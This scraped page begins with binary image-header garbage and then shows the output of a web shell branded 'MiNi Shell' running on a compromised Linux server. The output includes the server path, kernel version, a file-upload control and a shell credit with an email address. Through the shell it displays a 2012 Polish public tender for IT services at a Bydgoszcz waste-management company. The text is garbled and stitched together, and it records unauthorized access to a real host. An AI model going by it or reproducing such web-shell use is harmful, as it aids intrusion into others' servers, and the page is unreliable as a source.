JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120831/326130-N-2012.html

<p class="kh_header"><b>Bydgoszcz: Usługi teleinformatyczne oraz rozbudowa infrastruktury informatycznej dla Międzygminnego Kompleksu Unieszkodliwiania Odpadów ProNatura Sp. z o. o. w Bydgoszczy<br>
MKUO ProNatura/ZP/NO/05/12<br></b><br>
<b>Numer ogłoszenia: 326130 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzygminny Kompleks Unieszkodliwiania Odpadów ProNatura  Sp. z o. o. , ul. Prądocińska 28, 85-893 Bydgoszcz, woj. kujawsko-pomorskie, tel. 0-52 52 220 47, faks 52 3493897.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pronatura.bydgoszcz.pl, www.mkuok.nbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi teleinformatyczne oraz rozbudowa infrastruktury informatycznej dla Międzygminnego Kompleksu Unieszkodliwiania Odpadów ProNatura Sp. z o. o. w Bydgoszczy<br>
MKUO ProNatura/ZP/NO/05/12<br>.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług teleinformatycznych oraz rozbudowa infrastruktury informatycznej dla Międzygminnego Kompleksu Unieszkodliwiania Odpadów ProNatura Sp. z o. o. w Bydgoszczy, które obejmują kompleksowo w swym zakresie zadania dotyczące:<br>
1) Komputera centralnego - File Server - 2 szt. (1. Linux, 2. W2008R2 MSSQL):<br>
a.	konserwacja Systemu Operacyjnego<br>
b.	konserwacja oprogramowania systemowego zainstalowanego na FileSerwerach<br>
c.	strojenie i aktualizacja systemu w celu poprawy wydajności i bezpieczeństwa w zakresie posiadanych przez Zamawiającego licencji<br>
d.	przeglądy prewencyjne zakończone protokołem (min. co 12 miesięcy)<br>
e.	nadzór nad sieciowym okablowaniem komputerowym<br>
f.	doradztwo w zakresie rozwoju sieciowego<br>

2) Stacji roboczych (komputery stacjonarne, notebooki, tablety)- 30 szt.:<br>
a.	instalacja, re-instalacja i re-konfiguracja systemu operacyjnego<br>
b.	instalacje i konfiguracje oprogramowania sieciowego<br>
c.	instalacje sterowników i poprawek programowych wymaganych do poprawnej i wydajniejszej pracy systemów<br>
d.	instalacja i konfiguracja programów biurowych oraz odpowiednich poprawek dostarczanych przez producenta programów biurowych<br>
e.	przeglądy prewencyjne zakończone protokołem (min. co 12 miesięcy)<br>
f.	rozbudowa komputerów z powierzonych przez Zamawiającego elementów<br>

3) Sprzęt peryferyjny (drukarki, skanery, urządzenia wielofunkcyjne) - 11 szt.<br>
a.	instalacja, re-instalacja i re-konfiguracja sprzętu peryferyjnego<br>
b.	podstawowe szkolenie z zasad użytkowania sprzętu peryferyjnego<br>
c.	okresowe przeglądy zakończone protokołem (min. co 12 miesięcy)<br>

4) Oprogramowania CRM COMARCH OPTIMA (Księgowość, Kadry-Płace, Handel, Logistyka):<br>
a. pomoc w bieżącej eksploatacji oprogramowania<br>
b. zgłaszanie na wniosek Zamawiającego uwag do producenta oprogramowania, monitorowania ich realizacji<br>
c. aktualizacja w zakresie posiadanych przez Zamawiającego licencji<br>

5) Oprogramowania firm trzecich (ADA - program do rozliczeń umów abonamentowych, Zimbra - system pocztowy, Legalis - baza informacji prawnej, Tipex - program obsługujący wagi wjazdowe na teren siedziby przy ul. Prądocińskiej 28) lub inne programy odpowiadające funkcjonalnie powyższym:<br>
a.	instalowanie poprawek dostarczonych przez producenta wpływających na bezpieczeństwo i jakość pracy<br>
b.	reprezentowanie interesów Zamawiającego w kontaktach z producentem oprogramowaniai asysta w zakresie właściwej eksploatacji oraz napraw w przypadku awarii <br>

6) Programów instytucji nadrzędnych:<br>
Płatnik ZUS<br>
a.	instalacja i aktualizacja oprogramowania w zakresie posiadanych przez Zamawiającego licencji<br>
b.	pomoc techniczna<br>

7) Archiwizacji danych dla dwóch rozłącznych instalacji (ul. Kościuszki 53, ul. Prądocińska 28):<br>
a.	organizacja systemu archiwizacji danych według założen ustalonych wspólnie 
z  Zamawiającym<br>
b.	administracja i konserwacja systemu archiwizacji danych<br>
c.	opracowanie i aktualizacja instrukcji oraz procedur archiwizacji danych<br>
d.	przeszkolenie wyznaczonych pracowników Zamawiającego<br>

8) Centrali telefonicznych SLICAN - 1 szt.<br>
a.	konfiguracja centrali telefonicznej<br>
b.	reprezentowanie interesów Zamawiającego w kontaktach z dostawcą usług telefonicznych w zakresie właściwego funkcjonowania oraz napraw w przypadku awarii<br>
c.	okresowe przeglądy zakończone protokołem (min. co 12 miesięcy)<br>
d.	podstawowe szkolenie z zasad użytkowania Centrali telefonicznej<br>

9) Usług internetowych - łącza bezprzewodowe:<br>
a.	dostarczenie do dwóch siedzib Zamawiającego w Bydgoszczy (ul. Prądocińska 28, ul. Kościuszki53) bezprzewodowego łącza internetowego (dostęp do Internetu) o przepustowości 8/4 Mbity<br>
b.	dostarczenie do dwóch siedzib Zamawiającego w Bydgoszczy (ul. Prądocińska 28, ul. Kościuszki 53) łącza rezerwowego opartego na sieci GSM <br>
c.	udostępnienie dla Zamawiającego 4 adresów publicznych IP, po 2 adresy dla każdej z siedzib Zamawiającego w Bydgoszczy (ul. Prądocińska 28, ul. Kościuszki 53).<br>
d.	instalacja i serwisowe naprawy  sprzętu niezbędnego dla zapewnienia  właściwego funkcjonowania łącza bezprzewodowego<br>

10) Budowy masztu antenowego dla zapewnienia właściwego poziomu sygnału łącza bezprzewodowego, umożliwiającego prawidłową realizację usługi. Podczas realizacji budowy i eksploatacji masztu antenowego należy spełnić poniższe warunki: <br>
       a. projektowany maszt antenowy musi spełniać wszelkie wymogi bezpieczeństwa, dotyczy to wykonania i konstrukcji masztu, rodzaju i sposobu montażu anten, montażu i zabezpieczeń masztu instalowanego we wskazanym przez Zamawiającego miejscu,<br>
       b. przed jego montażem należy uzyskać stosowne uzgodnienia i zezwolenia wynikające głównie z prawa budowlanego i  ustawy prawo ochrony środowiska oraz innych jeżeli będą konieczne, <br>
c.	montaż konstrukcji należy prowadzić pod nadzorem osób posiadających odpowiednie  uprawnienia za pomocą korzystania z odpowiednich narzędzi i urządzeń, przestrzegając przepisów BHP oraz regulaminu KUO,<br>
d.	lokalizacja masztu - dach sortowni na terenie KUO przy ul. Prądocińskiej 28 
w Bydgoszczy, <br>
e.	Zamawiający wyznacza dzień wizji lokalnej na 4 września 2012 roku, godz. 9.00 (zbiórka przy ul. Prądocińskiej 28 - parking przed Kompleksem Utylizacji Odpadów) w Bydgoszczy, podczas której wskaże szczegółową lokalizację masztu zainteresowanym Wykonawcom. Wskazanym jest aby Wykonawcy, którzy zechcą wziąć udział w wizji, skontaktowali się wcześniej z Zamawiającym, podając dane osób, które będą uczestniczyć w wizji oraz składając deklarację o posiadaniu odpowiednich badań lekarskich (w przypadku osób chcących wejść na dach w celu oględzin). Zamawiający umożliwi Wykonawcom wejście na dach sortowni za pomocą drabiny włazowej pod warunkiem posiadania przez Wykonawcę odpowiednich zaświadczeń lekarskich umożliwiających przebywanie na wysokości i posiadanie odpowiedniego sprzętu umożliwiającego poruszanie się Wykonawcy po dachu sortowni zgodnie z przepisami BHP,<br>
f.	przed rozpoczęciem procesu projektowania masztu szczegółową lokalizację i sposób montażu należy uzgodnić z Zamawiającym. Zamawiający dysponuje dokumentacją techniczną hali sortowni, która zostanie udostępniona do wglądu Wykonawcy na miejscu (ul. Prądocińska 28 w Bydgoszczy)<br>
g.	Wykonawca powinien w swojej ofercie zawrzeć wszystkie koszty związane z ewentualnym 
montażem konstrukcji masztu antenowego, jak również demontaż istniejącego, aluminiowego masztu kratowego z dachu sortowni. Istniejący maszt kratowy spełnia w chwili obecnej funkcję analogiczną do masztu projektowanego. Demontaż masztu istniejącego nie może zakłócić pracy systemów informatycznych Zamawiającego w godzinach funkcjonowania Spółki. <br>

11) Konserwacji i eksploatacji wybudowanego masztu, o którym mowa w pkt. 10:
a.	projektowany maszt antenowy ma służyć wyłącznie potrzebom związanym 
z prawidłowym funkcjonowaniem łącza bezprzewodowego i realizacji usług wskazanych w Opisie Przedmiotu Zamówienia dla MKUO ProNatura Sp. z o.o.,<br>
b.	Wykonawca przejmie całkowitą odpowiedzialność za bieżącą konserwację, przeglądy techniczne oraz konieczne naprawy przez czas trwania zawartej umowy, jak również koszty z tym związane powinny być wkalkulowane w ofertę Wykonawcy.<br>

12) Usług Internetowych:<br>
a.	instalacja , konfiguracja i aktualizacja oprogramowania Internetowego w stacjach roboczych w zakresie posiadanych przez Zamawiającego licencji<br>
b.	administracja skrzynkami poczty elektronicznej na stacjach roboczych <br>
c.	instalacja i konfiguracja łącza internetowego umożliwiającego zdalną pomoc techniczną przez Wykonawcę<br>

13) Utrzymania i rozbudowy strony internetowej opartej o CMS<br>
a.	zapewnienie  hostingu  strony internetowej<br>
b.	150 godzin prac programistycznych w celu serwisu i rozbudowy strony<br>
c.	rozbudowa w zakresie CMS o:<br>
- możliwość zmiany hasła i loginu administratora do panelu CMS,<br>
- zabezpieczenia przed próbami nieautoryzowanego dostępu do panelu sterowania (blokowanie konta po 3 próbach błędnego wpisania hasła),<br>
- możliwość sporządzania raportów, statystyk z pracy - liczba artykułów, załączników etc., zarówno opublikowanych redaktorów jak i oglądanych z zewnątrz (statystyki odwiedzin całości i poszczególnych części serwisu oraz pobrań załączników); możliwość generowania przez administratora plików PDF i EXCEL (do wyboru) z danymi zawartymi w statystykach,<br>
- możliwość publikacji w artykułach plików graficznych i animacji 
w ogólnie dostępnych formatach (JPG, gif, png, swf, mpg, avi, wmv); generowanie animacji flash-owych na podstawie plików mpg, avi, wmv,<br>
- możliwość globalnej zmiany layout-u serwisu oraz układu strony - min. 3, w tym: świąteczny (bożonarodzeniowy i wielkanocny)<br>
- możliwość publikacji w artykule załączonego pliku Flash,<br>
- możliwość  umieszczania elementów strony w technologii Flash,<br>
- możliwość podglądu artykułu oraz całego serwisu przed ostateczną publikacją,<br>
- możliwość generowania formularzy online w tym formularzy zamówień/sprzedaży,<br>
c. rozbudowa w zakresie graficznym:<br>
- opracowanie min. 5 modułów graficznych na potrzeby elementów animacyjnych 
        i multimedialnych strony.<br>
Wykonawca przedstawi projekt graficzny i funkcjonalność poszczególnych elementów o które zostanie rozbudowana strona do akceptacji Zamawiającego, w tym projekt strony głównej i dwóch podstron, propozycje layoutów globalnych i layoutów artykułów. <br>


14) Serwis oraz HELP DESK w zakresie pkt. 1) - 9) oraz 12) - 13)<br>
a.	udzielanie telefonicznych konsultacji i porad dla pracowników Zamawiającego od poniedziałku do piątku w godz. 7.30 - 15.30 <br>
b.	godzinny dyżur informatyka w siedzibie Zamawiającego przy ul. Prądocińskiej 28 w Bydgoszczy, min. 2 razy w tygodniu, zgodnie z ustalonym terminarzem<br>
c.	godzinny dyżur d informatyka w siedzibie Zamawiającego przy ul. Kościuszki 53 w Bydgoszczy, min. 2 razy w tygodniu, zgodnie z ustalonym terminarzem
d.	przygotowanie w przypadku awarii na prośbę Zamawiającego ekspertyzy technicznej  z zakresem i wyceną kosztów  zakupu części zamiennych lub nowego sprzętu<br>
e.	gotowość serwisowa z dojazdem w godz. 7.30-15.30, <br>
- czas reakcji na zgłoszenie awaryjne dotyczące stacji roboczych, urządzeń peryferyjnych - 12 h (nie później niż następny dzień roboczy) oraz 2 h dla serwerów i sieci, od momentu  zgłoszenia telefonicznego lub pisemnego <br>
- czas naprawy awarii dotyczących stacji roboczych i urządzeń peryferyjnych - do 48 h oraz do 36 h dla serwerów i sieci od momentu zgłoszenia telefonicznego lub pisemnego <br>

15) Inwentaryzacji sprzętu i oprogramowania <br>
a. inwentaryzacja sprzętu i oprogramowania wraz z kontrolą legalności zainstalowanego oprogramowania zakończona protokołem, min. co 12 miesięcy<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie  zamówień uzupełniających w wysokości nieprzekraczającej 10 % wartości zamówienia podstawowego<br></li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5, 72.70.00.00-7, 72.31.50.00-6, 50.31.20.00-5, 45.23.23.30-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca przedstawi - aktualny dokument potwierdzający, że profil działalności Wykonawcy odpowiada przedmiotowi zamówienia oraz, że Wykonawca jest uprawniony w obrocie prawnym, zgodnie z wymaganiami ustawowymi (art. 22 ust. 1 pkt 1 ustawy) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert<br></p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca przedstawi wykaz świadczonych usług; Wykonawca musi wykazać, iż w ciągu ostatnich trzech lat przed wszczęciem postępowania, a w przypadku gdy okres prowadzenia działalności jest krótszy, w tym okresie wykonywał należycie co najmniej trzy  usługi outsourcingowe w zakresie teleinformatycznym, przy czym co najmniej dwie usługi trwały nie krócej niż 24 miesiące, a każda z nich obejmowała zarządzanie serwerami Linux, obsługę stacji roboczych, organizację systemu archiwizacji danych oraz obsługę  oprogramowania CRM Comarch Opitma. Wykonawca na potwierdzenie spełniania tego warunku udziału w postępowaniu załączy  stosowne oświadczenie i referencje. Ponadto Wykonawca potwierdzi stosownym zaświadczeniem posiadany status partnera Comarch dla eksploatowanego przez Zamawiającego systemu OPTIMA. <br></p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust 1 ustawy, stanowiące załącznik nr 1 do SIWZ,<br>
2) Oświadczenie, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust 1 i 2 ustawy, stanowiące załącznik nr 2 do SIWZ,<br>
3) Formularz oferty stanowiący załącznik nr 3 do SIWZ,<br>
4) Wykaz świadczonych usług stanowiący załącznik nr 4 do SIWZ; Wykonawca musi wykazać, iż w ciągu ostatnich trzech lat przed wszczęciem postępowania, a w przypadku gdy okres prowadzenia działalności jest krótszy, w tym okresie wykonywał należycie co najmniej trzy  usługi outsourcingowe w zakresie teleinformatycznym, przy czym co najmniej dwie usługi trwały nie krócej niż 24 miesiące, a każda z nich obejmowała zarządzanie serwerami Linux, obsługę stacji roboczych, organizację systemu archiwizacji danych oraz obsługę  oprogramowania CRM Comarch Opitma. Wykonawca na potwierdzenie spełniania tego warunku udziału w postępowaniu załączy  stosowne oświadczenie i referencje. Ponadto Wykonawca potwierdzi stosownym zaświadczeniem posiadany status partnera Comarch dla eksploatowanego przez Zamawiającego systemu OPTIMA. <br>
5) Jeśli dotyczy - pełnomocnictwo do podpisania oferty podpisane przez osobę/y figurującą/e w rejestrze Przedsiębiorców (lub innym dokumencie) jako posiadająca uprawnienia do podpisywania zobowiązań w imieniu Wykonawcy - jeżeli uprawnienie takie nie wynika z załączonych danych rejestrowych, brak podpisu na ofercie lub podpisanie oferty przez osobę/y do tego nieupoważnione  będzie skutkowało odrzuceniem oferty na podstawie art. 89 ust. 1 pkt. 8 ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcje.uzp.gov.pl.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pronatura.bydgoszcz.pl, www.mkuok.nbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzygminny Kompleks Unieszkodliwiania Odpadów ProNatura Sp. z o.o. <br>
ul.Kościuszki 53, 85-079 Bydgoszcz<br>.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 10:00, miejsce: Międzygminny Kompleks Unieszkodliwiania Odpadów ProNatura Sp. z o.o. <br>
ul.Kościuszki 53, 85-079 Bydgoszcz<br>.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com